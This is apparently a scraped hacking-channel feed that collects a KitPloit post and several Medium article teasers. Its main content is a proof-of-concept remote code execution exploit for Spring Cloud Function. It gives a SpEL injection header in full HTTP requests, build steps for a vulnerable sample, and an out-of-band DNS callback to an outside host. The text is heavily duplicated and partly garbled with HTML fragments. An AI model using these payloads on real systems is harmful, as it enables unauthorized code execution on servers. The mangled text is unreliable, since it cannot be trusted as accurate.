Cross-Site Scripting (XSS) via image rendering application
Hello Hackers, I’m MrEmpy, I’m 17 years old and welcome. Today I’m going to teach you how to test an image rendering application and be…Continue reading on Medium »
Read more...
Hello Hackers, I’m MrEmpy, I’m 17 years old and welcome. Today I’m going to teach you how to test an image rendering application and be…Continue reading on Medium »
Read more...
Spring-Spel-0Day-Poc - Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression, RCE, 0day, 0-day, POC, EXP
http://www.kitploit.com/2022/03/spring-spel-0day-poc-spring-cloud.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2022/03/spring-spel-0day-poc-spring-cloud.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Spring-Spel-0Day-Poc - Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression, RCE, 0day, 0-day, POC, EXP
spring-cloud/spring-cloud-function RCE (https://www.kitploit.com/search/label/RCE) EXP POC https://github.com/spring-cloud/spring-cloud-function header spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app")
build wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip
unzip v3.1.6.zip
cd spring-cloud-function-3.1.6
cd spring-cloud-function-samples/function-sample-pojo
mvn package
java -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar
___________________________
@hacking_Attack
@Hacking_Video
build wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip
unzip v3.1.6.zip
cd spring-cloud-function-3.1.6
cd spring-cloud-function-samples/function-sample-pojo
mvn package
java -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
get path lists for test find . -name "*.java"|xargs -I % cat %|grep -Eo '"([^" \.\/=>\|,:\}\+\)'"'"']{8,})"'|sort -u|sed 's/"//g' ...
functionRouter
uppercase
lowercase
...
___________________________
@hacking_Attack
@Hacking_Video
functionRouter
uppercase
lowercase
...
___________________________
@hacking_Attack
@Hacking_Video
poc1 POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X (https://www.kitploit.com/search/label/OS%20X) 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app")
Content-Length: 5
51pwn
___________________________
@hacking_Attack
@Hacking_Video
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X (https://www.kitploit.com/search/label/OS%20X) 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app")
Content-Length: 5
51pwn
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
poc2 POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.net.InetAddress).getByName("random87535.rce.51pwn.com")
Content-Length: 5
51pwn
check curl -v 'https://51pwn.com/dnslog?q=random87535.rce.51pwn.com'
Download Spring-Spel-0Day-Poc (https://github.com/hktalent/spring-spel-0day-poc)
___________________________
@hacking_Attack
@Hacking_Video
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.net.InetAddress).getByName("random87535.rce.51pwn.com")
Content-Length: 5
51pwn
check curl -v 'https://51pwn.com/dnslog?q=random87535.rce.51pwn.com'
Download Spring-Spel-0Day-Poc (https://github.com/hktalent/spring-spel-0day-poc)
___________________________
@hacking_Attack
@Hacking_Video
Cross-Site Scripting (XSS) via image rendering application
https://medium.com/@mrempy/cross-site-scripting-xss-via-image-rendering-application-f8427afe746d?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@mrempy/cross-site-scripting-xss-via-image-rendering-application-f8427afe746d?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Cross-Site Scripting (XSS) via image rendering application
Hello Hackers, I’m MrEmpy, I’m 17 years old and welcome. Today I’m going to teach you how to test an image rendering application and be…
Hello Hackers, I’m MrEmpy, I’m 17 years old and welcome. Today I’m going to teach you how to test an image rendering application and be…Continue reading on Medium » (https://medium.com/@mrempy/cross-site-scripting-xss-via-image-rendering-application-f8427afe746d?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Cross-Site Scripting (XSS) via image rendering application
Hello Hackers, I’m MrEmpy, I’m 17 years old and welcome. Today I’m going to teach you how to test an image rendering application and be…
Hacking on Medium
Preventing clickjacking exploits using AWS Cloudfront
https://cdn-images-1.medium.com/max/2600/1*EKe18g1l7Etlkt4b3VEi8w.jpeg
I recently got an email from a white hat hacker about how our site was vulnerable to clickjacking exploits. As a small startup focused on…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Preventing clickjacking exploits using AWS Cloudfront
https://cdn-images-1.medium.com/max/2600/1*EKe18g1l7Etlkt4b3VEi8w.jpeg
I recently got an email from a white hat hacker about how our site was vulnerable to clickjacking exploits. As a small startup focused on…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Preventing clickjacking exploits using AWS Cloudfront
I recently got an email from a white hat hacker about how our site was vulnerable to clickjacking exploits. As a small startup focused on…
Hacking on Medium
Easiest Way to Track Any User’s Twitter Follower Count
https://cdn-images-1.medium.com/max/2600/1*rxg6l6D-cdhLNTDqGQt7QQ.png
So, you want to keep a log of your Twitter follower growth, right? There are many ways to do it:
Continue reading on Dev Genius »
Easiest Way to Track Any User’s Twitter Follower Count
https://cdn-images-1.medium.com/max/2600/1*rxg6l6D-cdhLNTDqGQt7QQ.png
So, you want to keep a log of your Twitter follower growth, right? There are many ways to do it:
Continue reading on Dev Genius »
Medium
Easiest Way to Track Any User’s Twitter Follower Count
So, you want to keep a log of your Twitter follower growth, right? There are many ways to do it:
Hacking on Medium
Nuevo ransomware basado en Python dirigido a portátiles web de JupyterLab
https://cdn-images-1.medium.com/max/1200/0*veRorUfjppiZGnUr
PUBLICADO EN 31 MARZO, 2022POR EHACKING
Continue reading on Medium »
Nuevo ransomware basado en Python dirigido a portátiles web de JupyterLab
https://cdn-images-1.medium.com/max/1200/0*veRorUfjppiZGnUr
PUBLICADO EN 31 MARZO, 2022POR EHACKING
Continue reading on Medium »
Medium
Nuevo ransomware basado en Python dirigido a portátiles web de JupyterLab
PUBLICADO EN 31 MARZO, 2022POR EHACKING
Hacking on Medium
THE GREATEST HEIST EVER IN DEFI SPACE (worth 600 million)
https://cdn-images-1.medium.com/max/957/1*OBvE71vQ-IzZ64rp9Jbjlg.png
600 million worth of Eth and stable coins wept from a Ronin gaming blockchain. What next?
Continue reading on Medium »
THE GREATEST HEIST EVER IN DEFI SPACE (worth 600 million)
https://cdn-images-1.medium.com/max/957/1*OBvE71vQ-IzZ64rp9Jbjlg.png
600 million worth of Eth and stable coins wept from a Ronin gaming blockchain. What next?
Continue reading on Medium »
Medium
THE GREATEST HEIST EVER IN DEFI SPACE (worth 600 million)
600 million worth of Eth and stable coins wept from a Ronin gaming blockchain. What next?
Hacking on Medium
Cross-Site Scripting (XSS) via image rendering application
https://cdn-images-1.medium.com/max/1000/0*1PfYtVmITrK9faWg.png
Hello Hackers, I’m MrEmpy, I’m 17 years old and welcome. Today I’m going to teach you how to test an image rendering application and be…
Continue reading on Medium »
Cross-Site Scripting (XSS) via image rendering application
https://cdn-images-1.medium.com/max/1000/0*1PfYtVmITrK9faWg.png
Hello Hackers, I’m MrEmpy, I’m 17 years old and welcome. Today I’m going to teach you how to test an image rendering application and be…
Continue reading on Medium »
Medium
Cross-Site Scripting (XSS) via image rendering application
Hello Hackers, I’m MrEmpy, I’m 17 years old and welcome. Today I’m going to teach you how to test an image rendering application and be…
Hacking on Medium
Joy VM Walkthrough
https://cdn-images-1.medium.com/max/1049/0*KLofwgajtminFAyG
Makineyi indirebilirsiniz.
Continue reading on Medium »
Joy VM Walkthrough
https://cdn-images-1.medium.com/max/1049/0*KLofwgajtminFAyG
Makineyi indirebilirsiniz.
Continue reading on Medium »
Medium
Joy VM Walkthrough
Makineyi indirebilirsiniz.
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
Spring-Spel-0Day-Poc - Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression, RCE, 0day, 0-day, POC, EXP
https://blogger.googleusercontent.com/img/a/AVvXsEjllEX0XapeLrY0h1FThW6EXfGJj27BHsz37EP0rB0kSkRIddlfnaDMfD-YJUFhDHeH9X_VLtfCMjxhaCu_zbwqICWgefLmIYjMEM4e4kueN9vKU_C0k4A6eltHTwPotZFZy03IQF0Pn28On3LNx7HtIrEIAlZFrtMWn9W6kCS0FMQgaHaIgEombnYc=w640-h164 spring-cloud/spring-cloud-function RCE EXP POC https://github.com/spring-cloud/spring-cloud-function header
Spring-Spel-0Day-Poc - Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression, RCE, 0day, 0-day, POC, EXP
https://blogger.googleusercontent.com/img/a/AVvXsEjllEX0XapeLrY0h1FThW6EXfGJj27BHsz37EP0rB0kSkRIddlfnaDMfD-YJUFhDHeH9X_VLtfCMjxhaCu_zbwqICWgefLmIYjMEM4e4kueN9vKU_C0k4A6eltHTwPotZFZy03IQF0Pn28On3LNx7HtIrEIAlZFrtMWn9W6kCS0FMQgaHaIgEombnYc=w640-h164 spring-cloud/spring-cloud-function RCE EXP POC https://github.com/spring-cloud/spring-cloud-function header
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app") buildwget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip
unzip v3.1.6.zip
cd spring-cloud-function-3.1.6
cd spring-cloud-function-samples/function-sample-pojo
mvn package
java -jar ./target/function-sample-pojo-2.0.0.RELEASE.jarhttps://blogger.googleusercontent.com/img/a/AVvXsEjllEX0XapeLrY0h1FThW6EXfGJj27BHsz37EP0rB0kSkRIddlfnaDMfD-YJUFhDHeH9X_VLtfCMjxhaCu_zbwqICWgefLmIYjMEM4e4kueN9vKU_C0k4A6eltHTwPotZFZy03IQF0Pn28On3LNx7HtIrEIAlZFrtMWn9W6kCS0FMQgaHaIgEombnYc=w640-h164 get path lists for testfind . -name "*.java"|xargs -I % cat %|grep -Eo '"([^" \.\/=>\|,:\}\+\)'"'"']{8,})"'|sort -u|sed 's/"//g'...
functionRouter
uppercase
lowercase
... https://blogger.googleusercontent.com/img/a/AVvXsEjtT9tOIFERen-o92zVmjjMGrU1VOsjB44JvIq42soyvpxuwfmuHffXKZAWoLyZ2KgTDa4o-3ynuNGcSpeyScgkULF0Zbwis8was14Oze1LIyUTsSUO0VGLLZmhILqpB8ryv5WQP8sh49lpZ-jjT2UsYUqAzwK5RQcW03bkmEPZMX84rElqKMVyPjOG=w640-h454 poc1Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15 Connection: close spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app") Content-Length: 5 51pwn">POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app")
Content-Length: 5
51pwn https://blogger.googleusercontent.com/img/a/AVvXsEj5NTmUaoLsPRLc1J6VS3Etx_6N4CPx0m99McBLfeTbKonpluWT9rXgrKeCtfLg5_ADWcEju6z03vTCDzUc2cu2QuhPeKM_J7MGnFm8w14LGY-sOkVIdOcPVvsL8ERnd_fSk8OEYsWXRx_tMu_x1EwvL7UbhUZ8hYJrya0j-PKJ_8H5psLQr8DZBFNy=w640-h322 poc2POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.net.InetAddress).getByName("random87535.rce.51pwn.com")
Content-Length: 5
51pwn checkcurl -v 'https://51pwn.com/dnslog?q=random87535.rce.51pwn.com'Download Spring-Spel-0Day-Poc